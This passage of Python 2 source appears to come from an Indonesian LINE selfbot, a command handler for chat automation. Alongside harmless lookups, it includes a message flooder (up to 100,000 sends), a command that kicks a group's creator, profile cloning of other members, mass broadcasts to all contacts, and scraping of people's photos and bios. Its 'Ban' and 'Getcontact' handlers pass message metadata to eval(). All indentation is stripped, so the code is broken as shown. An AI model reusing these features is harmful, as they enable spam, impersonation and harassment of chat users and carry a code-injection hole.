cl.sendText(msg.to,"Tag On")
else:
cl.sendText(msg.to,"already on")
if wait["tag2"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang ngeTag Kick on")
else:
cl.sendText(msg.to,"Yang ngeTag Kick on")
else:
wait["tag2"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang ngeTag Kick on")
else:
cl.sendText(msg.to,"Yang ngeTag Kick on")
if wait["Protectguest"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger On")
else:
cl.sendText(msg.to,"done")
#=================================================
elif msg.text in ["Mode Off","mode off"]:
if msg.from_ in admin or owner:
if wait["QrProtect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["QrProtect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if wait["MProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
if msg.to in wait['pname']:
cl.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ALREADY OFF")
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"proтecт cancel oғғ")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect already oғғ")
if wait["Wc"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ joιn oғғ")
else:
wait["Wc"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nayapa yg gabung already oғғ")
if wait["Lv"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ leave oғғ")
else:
wait["Lv"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nayapa yg left already oғғ")
if wait["autoKick"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick oғғ")
else:
wait["autoKick"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick already oғғ")
if wait["tag"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Tag off")
else:
cl.sendText(msg.to,"Tag Off")
else:
wait["tag"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag Off")
else:
cl.sendText(msg.to,"Already Tag off")
if wait["tag2"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang ngeTag Kick off")
else:
cl.sendText(msg.to,"Yang ngeTag Kick off")
else:
wait["tag2"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang ngeTag Kick off")
else:
cl.sendText(msg.to,"Yang ngeTag Kick off")
if wait["Protectguest"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger Off")
else:
cl.sendText(msg.to,"done")
#===================================================
elif msg.text in ["Qr On","qr on"]:
if msg.from_ in admin or owner:
if wait["QrProtect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["QrProtect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr Off","qr off"]:
if msg.from_ in admin or owner:
if wait["QrProtect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["QrProtect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
#-----------------------------------------------
elif msg.text in ["Member On"]:
if msg.from_ in admin or owner:
if wait["MProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Member Off"]:
if msg.from_ in admin or owner:
if wait["MProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
#-----------------------------------------------
elif "Kr say " in msg.text:
bctxt = msg.text.replace("Kr say ","")
cl.sendText(msg.to,(bctxt))
cl.sendText(msg.to,(bctxt))
elif ".. " in msg.text:
bctxt = msg.text.replace(".. ","")
cl.sendText(msg.to,(bctxt))
cl.sendText(msg.to,(bctxt))
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': "u31ef22df7f538df1d74dc7f756ef1a32"}
cl.sendText(msg.to,"MyCreator")
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': "u9cc2323f5b84f9df880c33aa9f9e3ae1"}
cl.sendText(msg.to,"MyCreator")
cl.sendText(msg.to,"Simanis madu ya!!")
ki.sendMessage(msg)
#-------------Fungsi Creator Finish-----------------#
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
#Vicky Kull~
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
#----------------------------------------------------
elif "Cs " in msg.text:
if msg.from_ in admin or owner:
string = msg.text.replace("Cs","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
else:
cl.sendText(msg.to,"Done")
#-----------------------------------------------
# elif "say " in msg.text.lower():
# say = msg.text.lower().replace("say ","")
# lang = 'id'
# tts = gTTS(text=say, lang=lang)
# tts.save("hasil.mp3")
# cl.sendAudio(msg.to,"hasil.mp3")
#--------------------
elif 'wiki ' in msg.text.lower():
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=3)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
#-----------------------------------------------
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Mungkin")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
#-----------------------------------------------
elif "Rate " in msg.text:
tanya = msg.text.replace("Rate ","")
jawab = ("10%","20%","30%","40%","50%","60%","70%","80%","90%","100%")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#-----------------------------------------------
elif "Getname @" in msg.text:
if msg.from_ in admin or owner:
_name = msg.text.replace("Getname @","")
_nametarget = _name.rstrip(" ")
gs = cl.getGroup(msg.to)
for h in gs.members:
if _nametarget == h.displayName:
cl.sendText(msg.to,"[DisplayName]:\n" + h.displayName )
else:
pass
elif "Getbio @" in msg.text:
if msg.from_ in admin or owner:
_name = msg.text.replace("Getbio @","")
_nametarget = _name.rstrip(" ")
gs = cl.getGroup(msg.to)
for h in gs.members:
if _nametarget == h.displayName:
cl.sendText(msg.to,"[Status]:\n" + h.statusMessage )
else:
pass
#-----------------------------------------------
#-----------------------------------------------
elif "zodiak " in msg.text:
tanggal = msg.text.replace("zodiak ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"Tanggal Lahir: "+lahir+"\n\nUsia: "+usia+"\n\nUltah: "+ultah+"\n\nZodiak: "+zodiak)
#-----------------------------------------------
elif msg.text in ["Invite creator"]:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif msg.text in ["Gcreator:kick"]:
if msg.from_ in admin or owner:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.kickoutFromGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
#----------------------------------------------
elif "Stalk " in msg.text:
print "[Command]Stalk executing"
stalkID = msg.text.replace("Stalk ","")
subprocess.call(["instaLooter",stalkID,"tmp/","-n","1"])
files = glob.glob("tmp/*.jpg")
for file in files:
os.rename(file,"tmp/tmp.jpg")
fileTmp = glob.glob("tmp/tmp.jpg")
if not fileTmp:
cl.sendText(msg.to, "Image not found, maybe the account haven't post a single picture or the account is private")
print "[Command]Stalk,executed - no image found"
else:
image = upload_tempimage(client)
cl.sendText(msg.to, format(image['link']))
subprocess.call(["sudo","rm","-rf","tmp/tmp.jpg"])
print "[Command]Stalk executed - succes"
#-------------------------------------------------------------
elif "Gbc " in msg.text:
if msg.from_ in admin or owner:
bctxt = msg.text.replace("Gbc ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia, (bctxt))
elif "Pm cast " in msg.text:
if msg.from_ in admin or owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Fbc " in msg.text:
if msg.from_ in admin or owner:
bctxt = msg.text.replace("Fbc ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia, (bctxt))
#----------------------------------------------------------
elif "Meikarta: " in msg.text:
if msg.from_ in admin or owner:
gid = msg.text.replace("Meikarta: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#------------------------------------------------------
elif "Getcover @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#-----------------------------------------------
elif "Getpp @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getpp @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#--------------------------------------------
elif msg.text in ["Autolike on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Autolike off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already")
#------------------------------------------------------------------
elif "Group On" in msg.text:
if msg.from_ in admin or owner:
if msg.to in wait['pname']:
cl.sendText(msg.to,"TURN ON")
else:
cl.sendText(msg.to,"ALREADY ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Group Off" in msg.text:
if msg.from_ in admin or owner:
if msg.to in wait['pname']:
cl.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ALREADY OFF")
elif "Turn off" in msg.text:
if msg.from_ in admin or owner:
try:
import sys
sys.exit()
cl.sendText(msg.to, "Bot is Turn Off")
except:
pass
#------------------------------------------------------------------
elif msg.text in ["Cancel On"]:
if msg.from_ in admin or owner:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"proтecт cancel on")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
elif msg.text in ["Cancel Off"]:
if msg.from_ in admin or owner:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"proтecт cancel oғғ")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already oғғ")
#--------------------------
elif msg.text in ["Njoin on"]:
if wait["Wc"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ joιn on")
else:
wait["Wc"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
elif msg.text in ["Njoin off"]:
if wait["Wc"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ joιn oғғ")
else:
wait["Wc"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already oғғ")
#--------------------------
elif msg.text in ["Nleave on"]:
if wait["Lv"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ leave on")
else:
wait["Lv"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
elif msg.text in ["Nleave off"]:
if wait["Lv"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ leave oғғ")
else:
wait["Lv"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already oғғ")
##--------------------------
elif msg.text in ["Kick On"]:
if msg.from_ in admin or owner:
if wait["autoKick"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick on")
else:
wait["autoKick"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
elif msg.text in ["Kick Off"]:
if msg.from_ in admin or owner:
if wait["autoKick"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick oғғ")
else:
wait["autoKick"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already oғғ") #----------------------------------------------------------------
elif 'music ' in msg.text.lower():
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
#------------------------------------------------
elif 'lirik ' in msg.text.lower():
try:
songname = msg.text.lower().replace('lirik ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
#-----------------------------------
elif "idline " in msg.text:
id = msg.text.replace("idline ", "")
find = cl.findContactsByUserId(id)
for findid in find:
try:
msg.contentType = 13
msg.contentMetadata = {'mid': findid.mid}
cl.sendMessage(msg)
except Exception as error:
print error
#-----------------------------------
elif "Getgroup" in msg.text:
group = cl.getGroup(msg.to)
path =("http://dl.profile.line-cdn.net/" + group.pictureStatus)
cl.sendImageWithURL(msg.to, path)
#----------------------------------
elif "reinvite" in msg.text.split():
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
try:
grCans = [contact.mid for contact in group.invitee]
cl.findAndAddContactByMid(msg.to, grCans)
cl.cancelGroupInvitation(msg.to, grCans)
cl.inviteIntoGroup(msg.to, grCans)
except Exception as error:
print error
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No Invited")
else:
cl.sendText(msg.to,"Error")
else:
pass
#----------------------------------
elif "Leavegroup " in msg.text.split():
if msg.from_ in admin or owner:
ng = msg.text.split().replace("Leavegroup ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in admin or owner:
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.sendText(i,"Bot di paksa keluar oleh owner!")
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
cl.sendText(msg.to,"Success left ["+ h +"] group")
#else:
#pass
#else:
#cl.sendText(msg.to,"Khusus Creator/Admin")
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin or owner:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
elif "Asupka: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Asupka: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#----------------------------------
elif "Getcontact " in msg.text:
if msg.from_ in admin or owner:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
#----------------------------------
elif "youtube " in msg.text.lower():
query = msg.text.lower().replace("youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&List' not in a['href']:
cl.sendText(msg.to,'Judul : ' + a['title'] + '\nLink : ' + 'http://www.youtube.com' + a['href'])
#---------------------------------
#-----------------------------------------
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot sudah berjalan selama "+waktu(eltime)
cl.sendText(msg.to,van)
#-----------------------------------------
elif msg.text in ["Restart"]:
if msg.from_ in owner:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
#-----------------------------------------
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin or owner:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Succes Copy profile")
except Exception as e:
print e
#-----------------------------------------
elif "Getinfo @" in msg.text:
nama = msg.text.replace("Getinfo @","")
target = nama.rstrip(' ')
van = cl.getGroup(msg.to)
for linedev in van.members:
if target == linedev.displayName:
mid = cl.getContact(linedev.mid)
#./linedev/ervan
try:
cover = cl.channel.getCover(linedev.mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + mid.displayName + "\n[Mid]:\n" + linedev.mid + "\n[BIO]:\n" + mid.statusMessage + "\n[Ava]:\nhttp://dl.profile.line-cdn.net/" + mid.pictureStatus + "\n[Cover]:\n" + str(cover))
else:
pass
elif "Getinfo2 " in msg.text:
mid = msg.text.replace("Getinfo2 ","")
anu = cl.getContact(mid)
try:
cover = cl.channel.getCover(mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + anu.displayName + "\n[Mid]:\n" + mid + "\n[BIO]:\n" + anu.statusMessage + "\n[Ava]:\nhttp://dl.profile.line-cdn.net/" + anu.pictureStatus + "\n[Cover]:\n" + str(cover))
#-----------------------------------------
elif msg.text in ["Gcreator"]:
if msg.toType == 2:
msg.contentType = 13
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
msg.contentMetadata = {'mid': gCreator}
gCreator1 = ginfo.creator.displayName
except:
gCreator = "Error"
cl.sendText(msg.to, "Group Creator : " + gCreator1)
cl.sendMessage(msg)
#-----------------------------------------------
elif msg.text in ["Tag on"]:
if wait["tag"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Tag On")
else:
wait["tag"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag On")
else:
cl.sendText(msg.to,"already on")
elif msg.text in ["Tag off"]:
if wait["tag"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
cl.sendText(msg.to,"Tag Off")
else:
wait["tag"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag Off")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Tag2 on"]:
if msg.from_ in admin or owner:
if wait["tag2"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Tag On")
else:
wait["tag2"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag On")
else:
cl.sendText(msg.to,"already on")
elif msg.text in ["Tag2 off"]:
if msg.from_ in admin or owner:
if wait["tag2"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
cl.sendText(msg.to,"Tag Off")
else:
wait["tag2"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag Off")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Auto on"]:
if msg.from_ in admin or owner:
if wait["auto"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot join on")
else:
cl.sendText(msg.to,"Bot join On")
else:
wait["auto"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot join On")
else:
cl.sendText(msg.to,"Bot join On")
elif msg.text in ["Auto off"]:
if msg.from_ in admin or owner:
if wait["auto"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot join off")
else:
cl.sendText(msg.to,"Bot join off")
else:
wait["auto"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot join off")
else:
cl.sendText(msg.to,"Bot join off")
#-----------------------------------------------
elif "Admadd @" in msg.text:
if msg.from_ in admin or owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admadd @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Telah Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command Di Tolak Jangan Sedih")
cl.sendText(msg.to,"Sudah Menjadi Admin Maka Tidak Bisa Menjadi Admin Lagi")
elif "Admrem @" in msg.text:
if msg.from_ in admin or owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admrem @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Telah Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command DiTolak")
cl.sendText(msg.to,"Admin Tidak Bisa Menggunakan")
elif msg.text in ["Adminlist",".alist"]:
if msg.from_ in admin or owner:
if admin == []:
cl.sendText(msg.to,"The adminlist is empty")
else:
cl.sendText(msg.to,"Sabar Dikit Mamang.....")
mc = ""
for mi_d in admin:
mc += "☄1�7 " +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------------------------------
elif "Setimage " in msg.text:
wait["Pap"] = msg.text.replace("Setimage ","")
cl.sendText(msg.to,"Image Has Ben Set To")
elif msg.text in ["Papimage","/Papim"]:
cl.sendImageWithURL(msg.to,wait["Pap"])
elif "Setvideo " in msg.text:
wait["Vid"] = msg.text.replace("Setvideo ","")
cl.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","/Papvid"]:
cl.sendVideoWithURL(msg.to,wait["Vid"])
#-----------------------------------------------
#-----------------------------------------------
elif ("Ban " in msg.text):
if msg.from_ in admin or owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
#-----------------------------------------------
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("Besok","Tahun Depan","Minggu Depan","Satu Abad")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#-----------------------------------------------
elif "Mycopy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin or owner:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Succes Copy profile")
except Exception as e:
print e
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "backup done")
except Exception as e:
cl.sendText(msg.to, str (e))
#--------------------------------------
elif msg.text in ["Time"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
#client.sendText(msg.to, rst)
#-----------------------------------------------
elif "image " in msg.text:
search = msg.text.replace("image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
#-----------------------------------------------
elif 'ig ' in msg.text.lower():
try:
instagram = msg.text.lower().replace("ig ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "========INSTAGRAM INFO USER========\n"
details = "\n========INSTAGRAM INFO USER========"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
#-----------------------------------------------
elif "Tr-id " in msg.text:
nk0 = msg.text.replace("Tr-id ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'id')
cl.sendText(msg.to,str(trans))
elif "Tr-th " in msg.text:
nk0 = msg.text.replace("Tr-th ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'th')
cl.sendText(msg.to,str(trans))
elif "Tr-ja " in msg.text:
nk0 = msg.text.replace("Tr-ja ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'ja')
cl.sendText(msg.to,str(trans))
